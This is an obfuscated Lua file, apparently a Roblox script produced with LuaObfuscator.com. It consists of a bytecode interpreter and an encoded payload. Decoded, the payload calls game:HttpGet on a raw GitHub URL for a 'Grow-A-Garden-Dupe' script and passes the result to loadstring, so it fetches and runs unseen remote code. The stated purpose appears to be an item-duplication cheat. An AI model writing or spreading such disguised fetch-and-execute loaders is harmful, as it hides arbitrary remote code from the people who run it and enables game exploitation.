--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v124=v5(v88,v19);v19=nil;return v124;else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + ((98 + 522) -(555 + (941 -(282 + 595)))))) ;return v89-(v89%(932 -(857 + 74))) ;else local v90=(570 -(367 + 201))^(v32-1) ;return (((v31%(v90 + v90))>=v90) and (928 -(214 + 713))) or ((1637 -(1523 + 114)) + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * 256) + v36 ;end if (v35==(1065 -(68 + 997))) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -(6 + 0)) ;v35=118 -(32 + 85) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 1 + 2 );v18=v18 + ((1311 -(87 + 263)) -(892 + 65)) ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * (469 -213)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=181 -(67 + 113) ;local v45=(v20(v43,1 + 0 ,49 -29 ) * ((2 + 0)^(127 -95))) + v42 ;local v46=v20(v43,973 -((2520 -1718) + 150) ,83 -52 );local v47=((v20(v43,(75 -(10 + 8)) -25 )==(1 + 0)) and  -1) or (998 -(915 + 82)) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else v46=1188 -(1069 + 118) ;v44=0 -0 ;end elseif (v46==(4477 -2430)) then return ((v45==(0 + 0)) and (v47 * ((3 -2)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((2 + (442 -(416 + 26)))^(843 -(368 + 423))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;local v50={};for v67=1 + 0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v91== #"{") then if (v92== #"\\") then v93=(function() return v94()~=0 ;end)();elseif (v92==(3 -1)) then v93=(function() return v95();end)();elseif (v92~= #"xnx") then else v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if (v91==0) then local v121=(function() return 0 + 0 ;end)();while true do if (v121==(1 + 0)) then v91=(function() return  #".";end)();break;end if (v121~=0) then else v92=(function() return v94();end)();v93=(function() return nil;end)();v121=(function() return 1;end)();end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 836 -(660 + 176) ;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if (v108==(0 + 0)) then v99=(function() return 0;end)();v100=(function() return nil;end)();v108=(function() return 203 -(14 + 188) ;end)();end if ((676 -(534 + 141))==v108) then while true do if (v99==0) then v100=(function() return v101();end)();if (v102(v100, #"!", #"!")==(0 + 0)) then local v127=(function() return 0 + 0 ;end)();local v128=(function() return;end)();local v129=(function() return;end)();local v130=(function() return;end)();local v131=(function() return;end)();while true do if ((2 + 0)==v127) then while true do if (v128~= #"asd") then else if (v102(v130, #"gha", #"gha")== #":") then v131[ #".com"]=(function() return v103[v131[ #"asd1"]];end)();end v104[v105]=(function() return v131;end)();break;end if (v128~= #"[") then else local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if (v172==0) then v173=(function() return 0 -0 ;end)();while true do if (v173~=(0 -0)) then else v131=(function() return {v106(),v106(),nil,nil};end)();if (v129==0) then local v187=(function() return 0 -0 ;end)();local v188=(function() return;end)();while true do if (v187==(0 -0)) then v188=(function() return 0;end)();while true do if ((0 + 0)==v188) then v131[ #"gha"]=(function() return v106();end)();v131[ #".com"]=(function() return v106();end)();break;end end break;end end elseif (v129== #" ") then v131[ #"asd"]=(function() return v107();end)();elseif (v129==(2 + 0)) then v131[ #"asd"]=(function() return v107() -((398 -(115 + 281))^16) ;end)();elseif (v129== #"xnx") then local v195=(function() return 0;end)();local v196=(function() return;end)();while true do if (v195~=(0 -0)) then else v196=(function() return 0 + 0 ;end)();while true do if (v196==(0 -0)) then v131[ #"nil"]=(function() return v107() -((2 + 0)^(1597 -(1535 + 46))) ;end)();v131[ #"asd1"]=(function() return v106();end)();break;end end break;end end end v173=(function() return 1 + 0 ;end)();end if (v173==(2 -1)) then v128=(function() return 1 + 1 ;end)();break;end end break;end end end if (v128==(562 -(306 + 254))) then local v174=(function() return 0 -0 ;end)();local v175=(function() return;end)();while true do if (v174==(867 -(550 + 317))) then v175=(function() return 0 -0 ;end)();while true do if (v175==(1467 -(899 + 568))) then if (v102(v130, #"}", #">")== #"]") then v131[2 + 0 ]=(function() return v103[v131[4 -2 ]];end)();end if (v102(v130,2 -0 ,5 -3 )== #"\\") then v131[ #"xxx"]=(function() return v103[v131[ #"91("]];end)();end v175=(function() return 286 -(134 + 151) ;end)();end if (v175~=(1 + 0)) then else v128=(function() return  #"xnx";end)();break;end end break;end end end if (v128~=(1456 -(282 + 1174))) then else local v176=(function() return 811 -(569 + 242) ;end)();while true do if (v176==(1666 -(970 + 695))) then v128=(function() return  #"{";end)();break;end if (v176~=(0 -0)) then else v129=(function() return v102(v100,2, #"asd");end)();v130=(function() return v102(v100, #"0313",1 + 5 );end)();v176=(function() return 1;end)();end end end end break;end if (v127==0) then local v132=(function() return 1024 -(706 + 318) ;end)();local v133=(function() return;end)();while true do if (v132==(1990 -(582 + 1408))) then v133=(function() return 1271 -(945 + 326) ;end)();while true do if (v133~=(3 -2)) then else v127=(function() return 1 -0 ;end)();break;end if (v133~=(0 + 0)) then else v128=(function() return 0 -0 ;end)();v129=(function() return nil;end)();v133=(function() return 1 + 0 ;end)();end end break;end end end if (v127==(1825 -(1195 + 629))) then local v134=(function() return 1500 -(1408 + 92) ;end)();while true do if (v134==(1086 -(461 + 625))) then v130=(function() return nil;end)();v131=(function() return nil;end)();v134=(function() return 1;end)();end if (v134==1) then v127=(function() return 2;end)();break;end end end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end;end)();local v53=(function() return function(v109,v110,v111) local v112=(function() return 1288 -(993 + 295) ;end)();local v113=(function() return;end)();while true do if ((0 -0)~=v112) then else v113=(function() return 0 + 0 ;end)();while true do if (v113~=(241 -(187 + 54))) then else local v125=(function() return 780 -(162 + 618) ;end)();local v126=(function() return;end)();while true do if (v125==(0 + 0)) then v126=(function() return 0 + 0 ;end)();while true do if (v126~=0) then else v109[v110-#"\\" ]=(function() return v111();end)();return v109,v110,v111;end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #",",v58 do FlatIdent_7126A,Type,Cons,v21,v24,v25,v59,v69=(function() return v51(FlatIdent_7126A,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"-19"]=(function() return v21();end)();for v70= #"[",v23() do FlatIdent_2661B,Descriptor,v21,v20,v59,v54,v70,v22,v23=(function() return v52(FlatIdent_2661B,Descriptor,v21,v20,v59,v54,v70,v22,v23);end)();end for v71= #"!",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[2];local v66=v61[532 -(406 + 123) ];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=1770 -(1749 + 20) ;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -(1 + 0) ;local v81={};local v82={};for v114=1145 -(466 + 679) ,v80 do if ((232<821) and (v114>=v74)) then v78[v114-v74 ]=v79[v114 + (4 -3) ];else v82[v114]=v79[v114 + 1 ];end end local v83=(v80-v74) + (2 -1) ;local v84;local v85;while true do local v115=0;while true do if ((1812<=3249) and (v115==(0 -(0 + 0)))) then v84=v72[v76];v85=v84[1901 -(106 + (2771 -(553 + 424))) ];v115=1;end if ((1623<=1957) and (v115==(1 -0))) then if (v85<=(3 + 4)) then if ((518<902) and (v85<=3)) then if ((2994>858) and (4412==4412) and (v85<=(1 + 0))) then if (v85==(0 -0)) then local v135=0 -0 ;local v136;while true do if (v135==0) then v136=v84[116 -(4 + 110) ];v82[v136]=v82[v136](v13(v82,v136 + (585 -(57 + 465 + 62)) ,v77));break;end end else v82[v84[(1418 + 11) -(41 + 1386) ]]=v84[3];end elseif ((v85>(105 -(17 + 86))) or (3755<=915)) then local v139=v84[2 + 0 ];v82[v139]=v82[v139](v13(v82,v139 + (1 -0) ,v77));else v82[v84[5 -3 ]]();end elseif (v85<=(171 -(122 + 44))) then if (v85>(6 -2)) then v82[v84[6 -4 ]]=v63[v84[3 + 0 + 0 ]];else do return;end end elseif (v85>(1 + 5)) then v82[v84[2]]=v63[v84[5 -(1 + 1) ]];else v82[v84[(39 + 28) -(30 + 35) ]]();end elseif (v85<=((17 -9) + 3)) then if ((3946>3743) and (v85<=(24 -15))) then if (v85==8) then v82[v84[4 -2 ]]={};else do return;end end elseif (v85==(1267 -(1043 + 63 + 151))) then local v146=v84[2];local v147,v148=v75(v82[v146](v13(v82,v146 + (3 -2) ,v84[1215 -(323 + 889) ])));v77=(v148 + v146) -(2 -1) ;local v149=580 -(361 + 219) ;for v166=v146,v77 do v149=v149 + ((1551 -1230) -((806 -(239 + 514)) + 267)) ;v82[v166]=v147[v149];end else local v150=0 + 0 ;local v151;local v152;while true do if (((1750>=842) and (v150==(413 -(15 + 398)))) or (1335>=3306)) then v151=v84[984 -(18 + 964) ];v152=v82[v84[11 -8 ]];v150=1;end if ((1 + 0 + 0)==v150) then v82[v151 + 1 + 0 ]=v152;v82[v151]=v152[v84[854 -((1349 -(797 + 532)) + 830) ]];break;end end end elseif ((4844>2253) and (v85<=13)) then if (v85>(10 + 2)) then local v153=v84[128 -(116 + 10) ];local v154=v82[v84[1 + 2 ]];v82[v153 + ((537 + 202) -(542 + 196)) ]=v154;v82[v153]=v154[v84[8 -4 ]];else v82[v84[1 + 1 ]]=v84[2 + 1 ];end elseif (v85==(6 + 8)) then v82[v84[4 -2 ]]={};else local v161=v84[(2 + 2) -2 ];local v162,v163=v75(v82[v161](v13(v82,v161 + 1 ,v84[1554 -(1126 + 425) ])));v77=(v163 + v161) -(2 -1) ;local v164=405 -(118 + 287) ;for v169=v161,v77 do local v170=0 -0 ;while true do if ((4372>1850) and (v170==(1121 -(118 + 1003)))) then v164=v164 + (2 -1) ;v82[v169]=v162[v164];break;end end end end v76=v76 + (378 -(142 + 235)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403513Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6761677363726970742Q302F47726F772D412D47617264656E2D447570652F6D61696E2F676167647570652E6C756100094Q000E7Q001205000100013Q001205000200023Q00200D000200020003001201000400044Q000A000200044Q000300013Q00022Q00060001000100012Q00043Q00017Q00",v9(),...);
